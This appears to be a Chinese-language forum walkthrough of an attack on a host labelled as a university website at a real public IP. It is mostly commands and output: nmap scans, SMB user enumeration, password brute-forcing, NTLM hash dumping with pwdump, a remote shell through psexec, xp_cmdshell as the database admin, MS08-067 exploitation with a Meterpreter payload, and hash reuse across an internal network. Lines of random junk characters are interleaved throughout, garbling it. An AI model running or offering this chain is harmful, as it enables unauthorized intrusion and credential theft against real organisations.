广西师范网站 http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
- R- _, r6 h1 |3 }
Nmap scan report for bogon (202.103.242.241)
' a \$ S U9 d, |( T3 C. F8 l7 m0 z" d$ M
Host is up (0.00048s latency).
1 ]$ |3 I1 b5 y+ O( M! ~! l: U2 P5 A: g- T' \) ?0 Z; H
Not shown: 993 closed ports
5 @7 g, r3 Q3 G& q, N ?" p9 O/ `/ h
PORT STATE SERVICE VERSION
: U; q2 u/ u9 M( k V8 b$ i* _9 E9 }! o% }# g( k& W$ [
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
9 R* k% r8 r7 t) L0 @$ ?: V
139/tcp open netbios-ssn
) `) ^7 e' P9 F4 \
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
8 o" A) J- ~4 X t# M0 n: g# }% `: i" i# R: q+ j* Y
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
4 t1 ]- T5 y1 D
1026/tcp open msrpc Microsoft Windows RPC
/ \; x/ q* h( g, W: S+ u
3372/tcp open msdtc?
0 w' e2 G3 {) g0 x1 \
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
6 x& [: A+ |: u1 N* }% z) @& J$ G8 M9 ^. Q
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
1 U9 ~7 o! ?; Z! y. y t) c$ j% }
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
4 y( Y6 ^# B5 \/ ?6 z- l
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
9 @' D. }# G' I6 F
SF:ptions,6,"hO\n\x000Z");
: _* B! z% D& h3 B+ G" \
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" {) P1 v/ v; E6 {3 C
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
6 U' `) Q n; |% g9 A* o& X# v4 o
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
7 a. K7 t: Z, y9 O" e/ D- K6 p0 ]$ Y
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
1 K2 r6 U7 k; _4 N2 G
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
* k) F% ]' }5 o1 I2 {
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
; e4 g) j- j& N$ H& \; q1 Z/ H
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
, Q* ^' w4 W+ Z. O B
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
- D( H' U9 e3 p
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
- D$ k5 m: W& j1 d5 g. ]
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
5 {1 `6 D7 a, z4 s- V6 H3 f @4 j0 u `( H/ r
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
6 C5 k! L# |, G8 t- z; @
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
& S# w, d( R2 o
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
! E' A: b. d1 T; x+ b" _3 X3 U- ~
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
2 q- t, f) w# Z$ _4 X% f+ V- A0 l
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
( S. _/ z/ d* _0 P8 [1 I' p' ~
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
, s+ H4 t' ]1 H* g9 S: o% n6 d4 O; i: t3 s: c3 Z8 ^/ A
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
8 ]: d7 Q5 r7 a) u2 x6 u! P, |
Host is up (0.00038s latency).
+ E/ I! [$ _( B* K
Not shown: 993 closed ports
" e: X& H* T# ]0 n4 ]7 s" W# |( ^( \# k! C8 s
PORT STATE SERVICE
135/tcp open msrpc
1 C l1 c- t, x" f+ a: N3 T9 e* j
139/tcp open netbios-ssn
7 c. d4 a+ Q9 O( q0 p' w$ N1 M: |6 N! L9 l8 T
445/tcp open microsoft-ds
+ o& c) l- O0 B5 X4 G$ C6 ^9 b, ?6 t
1025/tcp open NFS-or-IIS
* x! E/ h: c5 h3 a
1026/tcp open LSA-or-nterm
* ?. [) O3 a+ I# k* l9 z+ z& z( g6 d$ M% N
3372/tcp open msdtc
8 ?! Z M1 m: h# {8 o( T# t4 k
3389/tcp open ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) h3 b* T+ ~# M) v3 H! _
Host script results:
5 ?: E, L: c; E6 `1 c. K3 u* k
| smb-enum-users:
) e$ d) f: r5 g
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
* z% ]( p+ A; e& j4 N- [
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
B8 n# A3 g. K- Z1 z0 t' _
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
: u; {) Y( G# ?6 D( P5 v
//查看共享
$ _6 ~' K. l. W) F7 d$ Q g+ M
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
. j; ?/ X" a( S0 l6 y5 F( s: F9 k4 ?; w+ ]
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
) n4 E3 n7 o# m6 p1 R
PORT STATE SERVICE
" l# ^4 \. W& A' T+ o; Y2 x. q9 D8 J8 u) o
135/tcp open msrpc
139/tcp open netbios-ssn
6 Q( F) _* Q- a9 y: b# F
445/tcp open microsoft-ds
" J+ L7 P4 _; Q$ }* A/ B
1025/tcp open NFS-or-IIS
6 D' M! B7 c1 ]' I+ V& E v N0 V2 D6 b
1026/tcp open LSA-or-nterm
: E7 |. l' Y# g4 O3 v3 V; G6 V% M- {3 R& j- R* I, i% I( ^' A
3372/tcp open msdtc
' l6 K: I, ]3 ?, V6 ?! r
3389/tcp open ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. H$ A- p( L; ?
Host script results:
| smb-enum-shares:
& }8 h9 s, n0 h- W9 ~8 j8 k: T# I
| ADMIN$
9 I$ m5 `* {9 i% n/ C' L
| Anonymous access: <none>
/ S" Y4 X5 C- {9 f- X& j( ~
/ B4 [$ Y1 ]) h5 `" Q( l| C$
% C" \/ A* p4 q1 L4 N
" c( q( A& x8 ]| Anonymous access: <none>& B: @0 g" e' x9 | Z. r- `
| IPC$
, L5 g8 E3 o1 |9 }% L1 k# Q9 H1 s/ Q
|_ Anonymous access: READ
1 _% T6 B* J) ^! h) }9 I1 |! o! U a7 b; m' O
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
# z' {4 ]& G5 v& G/ p' M# t9 e5 k3 t: }7 {3 w2 E
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
Z7 I, Q& P7 p% {3 V' }! [1 A* q4 q0 ~( F; b
//获取用户密码
. k3 q+ x0 ]0 ~( e8 p; D. x* D. Z: G8 \- n8 H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
$ | m& L: z2 z
Nmap scan report for bogon (202.103.242.2418)' r0 T l7 C5 D; ~# M: U2 ?2 A& L
9 g, D9 q9 s1 Q
Host is up (0.00041s latency).
Not shown: 993 closed ports
) k& [! r/ D! p9 Z, b2 z4 J
PORT STATE SERVICE
- a! P: w$ ]0 S7 K4 w
135/tcp open msrpc
: P7 u' x% b4 {% O' y
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3 o& g: c- W8 N6 R
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
! |$ F0 S% s( X/ M0 ?, E( D% j7 h' E) ]1 P4 w
3389/tcp open ms-term-serv
) n" R C1 W' z# @9 U3 {2 \
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( V" n8 r$ I0 s! q8 e5 J) T' |8 v* W) x7 Z2 r3 A: N
Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
, z. ]2 l7 S/ ?* m
|_ test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
7 q' t: A- I5 R0 j+ I6 {
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
& \4 U: H0 f$ {, q( _- A0 D! a+ C- \) x+ _( r7 [
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
2 [: ?% P4 M6 D* V: h* C# O% w0 c; u' e0 r( V- c
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
" r7 d, C; N; g0 u, d/ d% ~9 o5 T5 a, b; f2 E* ~
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
) L6 F0 b2 C; A+ ?6 o: c; |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
4 z4 Y( m$ S) p7 M4 }8 M4 ]# c- Y9 b; c- Q# `6 {
Nmap scan report for bogon (202.103.242.241)
3 Z' f) @ x$ n* O, V* v. k5 [: j% B! [1 E/ L
Host is up (0.0012s latency).
9 E f* [6 M7 U# O5 Q
PORT STATE SERVICE
( }3 I7 ~/ W' ^* r6 l# U4 {; E
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
0 Q" e; C' u: w+ d6 R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
9 ~6 h- ], F* R Y9 p4 A& N! a
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
1 g7 E, X! v% G3 r7 k
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
; L/ _" u6 n) B
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
( ~ c8 k1 Y/ r U. |# ^$ E* u- ^# e9 z$ ?
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
% c5 i3 z5 V, _+ D% F L) m8 g
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
6 P0 P2 B5 W% a L# u+ l/ ?; a% X L9 i. v! f5 j, m/ _
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
) P& d7 Z; u( f3 {, R* r8 ?* x% |' O, Y' L% _: i9 R8 ~' M ?
-p 123456 -e cmd.exe
- q5 \. E$ ?7 p# n7 J
PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
( ~+ M; a1 s) V' F7 @, d1 l5 v, z3 I; p0 j# Y7 B2 Z$ }9 U" ~
Sysinternals - www.sysinternals.com
* s- J* F l J4 _0 A- F
Microsoft Windows 2000 [Version 5.00.2195]
/ v9 \. v7 t: o- z
(C) 版权所有 1985-2000 Microsoft Corp.
4 ^8 [2 Y: W. b1 Z$ i
C:\WINNT\system32>ipconfig
- D' @( ~" X3 G, ]8 Y# ~1 H! @
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
' {" p, o# W Q# _) V/ @, w) y6 [; r
IP Address. . . . . . . . . . . . : 202.103.242.241
: B; s; Y; u, ~3 z; _" P2 Z& \7 u2 ?6 i7 a
Subnet Mask . . . . . . . . . . . : 255.255.255.0
/ K! H4 P6 m' a8 g" F/ S5 E4 R. G) V; E
Default Gateway . . . . . . . . . : 202.103.1.1
1 w# s- n0 d7 e8 v1 v7 A! C
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" //远程登录sa执行命令
4 J9 n# @( X) u6 G- m$ w/ | s
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
7 P1 C( x" X. q/ U `% u: y! n
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
* P$ ~" ^4 _+ H0 G8 c+ N% _
Nmap scan report for bogon (202.103.242.241)
: P8 n6 Z0 `( F0 L
Host is up (0.00046s latency).
5 X6 y/ b3 [; k' o: {4 R9 {1 s+ ~% e( a- Y. h5 ~ E d9 o
Not shown: 993 closed ports
T0 Q X5 g# L8 y# N9 Q
PORT STATE SERVICE
% C; f5 ~4 u$ `) k% f
135/tcp open msrpc
( X- ^* R" M7 ?
139/tcp open netbios-ssn
9 }# d2 R/ `) N$ g) S) i
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
: q; y, a$ g( O; D' Z- V4 Z6 p2 y- _0 y& B4 b
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
" |- W2 Z9 }9 A2 f0 ^, m) w0 N2 x9 v2 R# c! N
3389/tcp open ms-term-serv
0 x* _& T; g; G) G% a* i
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) y, j6 j6 z8 G- ^* [- z ]
Host script results:
9 j! P- r8 ?2 E1 l2 k
| smb-check-vulns:
! i8 {. N* S, V1 I
|_ MS08-067: VULNERABLE
! b. X+ x/ u h4 G4 g. i$ ]
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
! B/ r: x( z/ b0 l; I$ q# b% \2 V: ~# C5 N& r$ V9 s3 c- s8 D
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
) [0 N" K6 l/ M6 n: E
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
- d) O- e& M8 r& f' g* a b% i" e @) A8 @/ O9 j
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
) q7 J1 V0 |- r- X c, y: ~% y1 @2 N D" h% R
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
1 W) [; v4 _- n" F/ _5 a+ ?$ Q; V* T
meterpreter >
; S" m2 _+ W0 D1 [9 o
Background session 2? [y/N] (ctrl+z)
& [8 ~: K9 e! i" o( U
msf exploit(ms08_067_netapi) > sessions -l
; Z, \# V" s: A# l9 n
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
9 C; {1 I( E4 r2 W: T/ c
test
" {0 E, t' {3 C0 Y
administrator
3 e' g: {5 D6 m- H( ^3 _" {* i+ B0 H1 H$ t6 o# T
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
6 ?" [: ^2 f* x- F$ r; B- X" R8 x: z: r7 J, r ~4 I
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
# }" z3 }! G- l3 T
//利用用户名跟获取的hash尝试对整段内网进行登录
A0 m% a. [, |* ~7 ~9 {/ m6 |Nmap scan report for 192.168.1.1055 Q. S4 M4 \- V
Host is up (0.00088s latency).
5 O; { J5 ^% V/ \/ R
Not shown: 993 closed ports
/ Z' u3 y+ m- Z( q# K
PORT STATE SERVICE
- C- b' L# c- S0 Z. e' r& `- W/ O
135/tcp open msrpc
; P9 K# R2 G/ `8 W: G% s
139/tcp open netbios-ssn
: ^/ r1 ^7 L) \7 x8 H u+ c" A+ l
445/tcp open microsoft-ds
; h' ^- w2 H( d
1025/tcp open NFS-or-IIS
7 f2 _/ ?; ^5 \3 y* H& V; T/ T; j8 @4 j2 ^* f9 s8 s
1026/tcp open LSA-or-nterm
' s, x/ T @$ _2 j, _7 P" | Q
3372/tcp open msdtc
# `' R) M) i& q T" ~6 a: y8 ~2 ]7 r2 X+ h1 q
3389/tcp open ms-term-serv
& m3 o [0 Y! B, f
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ J% C( i: e: h0 t, O1 [
Host script results:
% o8 z" _' O( w6 g3 H" x0 o. k( R! V' ~. u; W5 W
| smb-brute:
- H9 S! A' z/ J) H, E- ?' R( _6 H$ n- D, ] j( e( {3 E
|_ administrator:<blank> => Login was successful
* H; ^+ H4 r: s" o6 h7 ]
攻击成功，一个简单的msf+nmap攻击~~
* s. N( t7 Y" F% B% r+ ^
|